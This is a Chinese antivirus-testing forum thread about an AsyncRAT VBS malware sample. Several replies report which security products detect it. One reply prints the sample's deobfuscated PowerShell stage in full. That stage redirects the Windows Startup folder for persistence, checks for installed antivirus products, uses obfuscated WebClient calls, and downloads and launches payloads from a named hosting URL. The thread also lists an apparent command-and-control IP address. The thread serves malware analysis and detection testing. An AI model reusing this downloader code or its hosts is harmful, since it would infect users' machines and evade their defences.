搜索
查看: 551|回复: 9
收起左侧

[病毒样本] #AsyncRAT #VBS

[复制链接]
hsks
发表于 6 天前 | 显示全部楼层 |阅读模式
本帖最后由 hsks 于 2021-5-2 13:52 编辑

双击估计都能杀
https://www.virustotal.com/gui/f ... 836a67a61/detection

172.96.186.134

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
a233
发表于 6 天前 | 显示全部楼层
Panda Dome
双击杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
心心相印
发表于 6 天前 | 显示全部楼层
eis miss
henry217
发表于 6 天前 | 显示全部楼层
Norton杀

这报毒名看不懂

难道是脚本控制?

但是日志说是启发

文件名: CL.Downloader!gen10
完整路径: 不可用

____________________________

____________________________


在电脑上
不可用

上次使用时间
2021/5/2 ( 13:59:41 )

启动项


已启动


威胁类型: 启发式病毒。 根据恶意软件启发式技术检测威胁。

____________________________


CL.Downloader!gen10
定位


未知
Norton 社区中使用了此文件的用户数未知 。

未知
此文件版本当前 未知。


此文件具有高风险。


____________________________


来源: 外部介质


____________________________

文件操作

文件: powershell.exe (CL.Downloader!gen10) 未尝试修复
____________________________


文件指纹 - SHA:
不可用
文件指纹 - MD5:
不可用


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
秋日之殇
发表于 6 天前 | 显示全部楼层
双击后云端启发杀
事件: 检测到恶意对象
用户类型: 活动用户
应用程序名称: wscript.exe
应用程序路径: C:\Windows\System32
组件: 文件反病毒
结果说明: 检测到
类型: 木马
名称: VHO:Trojan.VBS.SAgent.gen
精确度: 启发式分析
威胁级别: 高
对象类型: 文件
对象名称: a75682a8be7a7470d0afbcb52b78fd4062fd4a719179730fe3ae6ce836a67a61.vbs
对象路径: C:\Users\ling\Desktop\a75682a8be7a7470d0afbcb52b78fd4062fd4a719179730fe3ae6ce836a67a61
MD5: BCBAD24347E93A0508784F3B4301B7EB
原因: 云保护
fdsax
发表于 6 天前 | 显示全部楼层
智量双击kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
正在缓冲
发表于 6 天前 | 显示全部楼层
拦了个连接,顺便还把PowerShell给放进隔离区了,病毒本体也不见了
此次发现新的报毒法

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
post88
发表于 6 天前 | 显示全部楼层
fs kill Trojan:W32/Generic.e53eebe440!Online
petr0vic
发表于 6 天前 | 显示全部楼层
  1. [system.io.directory]::CreateDirectory("C:\P"+"r"+"o"+"g"+"ra"+"mDa"+"t"+"a\Micr"+"oso"+"f"+"t A"+"rts"+"\S"+"ta"+"rt")
  2. start-sleep -s 5
  3. Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
  4. start-sleep -s 5
  5. Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";


  6. Function aloshy
  7. {
  8. if([System.IO.File]::Exists("C:\Program Files\Avast Software\Avast\AvastUI.exe")){

  9. start-sleep -s 10

  10. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"


  11. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"


  12. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"

  13. start-sleep -s 7
  14. Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
  15. start-sleep -s 3
  16. Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
  17. }
  18. elseif([System.IO.File]::Exists("C:\Program Files\ESET\ESET Security\ecmds.exe")){



  19. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"


  20. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/2.txt', 'C:\Users\Public\msi.ps1') }"


  21. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"

  22. start-sleep -s 7
  23. Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
  24. start-sleep -s 3
  25. Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
  26. }

  27. elseif([System.IO.File]::Exists("C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe")){



  28. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"


  29. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"


  30. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"

  31. start-sleep -s 7
  32. Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
  33. start-sleep -s 3
  34. Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
  35. }

  36. elseif([System.IO.File]::Exists("C:\Program Files\AVG\Antivirus\AVGUI.exe")){



  37. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"


  38. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"


  39. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"

  40. start-sleep -s 7
  41. Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
  42. start-sleep -s 3
  43. Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
  44. }
  45. else{

  46. $defender = 'C^^^^^^^^^^^^^^^^^^blic\'.Replace("^^^^^^^^^^^^^^^^^^",":\Users\Pu")
  47. if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://nyc002.hawkhost.com/~mazenne1/NDef/all.bat', $defender + '11.ps1')){
  48. }

  49. $def = 'C^^^^^^^^^^^^^^^^^^blic\'.Replace("^^^^^^^^^^^^^^^^^^",":\Users\Pu")

  50. if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://nyc002.hawkhost.com/~mazenne1/ExDef/ss.vbs', $def + 'ss.vbs')){
  51. }
  52. start-sleep -s 25
  53. start "C:\Users\Public\ss.vbs"

  54. start-sleep -s 20


  55. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"


  56. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"


  57. powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"

  58. start-sleep -s 7
  59. Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
  60. start-sleep -s 3
  61. Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
  62. }
  63. }
  64. IEX aloshy
复制代码


Nocria
发表于 6 天前 | 显示全部楼层


  1. G DATA INTERNET SECURITY has prevented malicious software from running on your system.
  2. The malicious program was identified by BEAST (Behavior Monitoring) as: Generic.926D1CBF

  3. The following processes were therefore terminated by G DATA for security reasons:
  4.         ----------------------------------------------------------------
  5.         C:\Program Files\WinRAR\WinRAR.exe (PID 3868)
  6.         C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (PID 1228)
  7.         ----------------------------------------------------------------

  8. The following programs responsible were moved to Quarantine by G DATA:
  9.         ----------------------------------------------------------------
  10.         C:\Users\promi\AppData\Local\Temp\Rar$DIb3868.17467\a75682a8be7a7470d0afbcb52b78fd4062fd4a719179730fe3ae6ce836a67a61.vbs
  11.         C:\Users\promi\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  12.         C:\Users\promi\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  13.         ----------------------------------------------------------------

  14. Further information:
  15. Ref: c32113fd-664d-475d-94de-e0ad74a6ea20
复制代码

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 湘ICP备2021004765号-1 ) GMT+8, 2021-5-8 06:48 , Processed in 0.127770 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表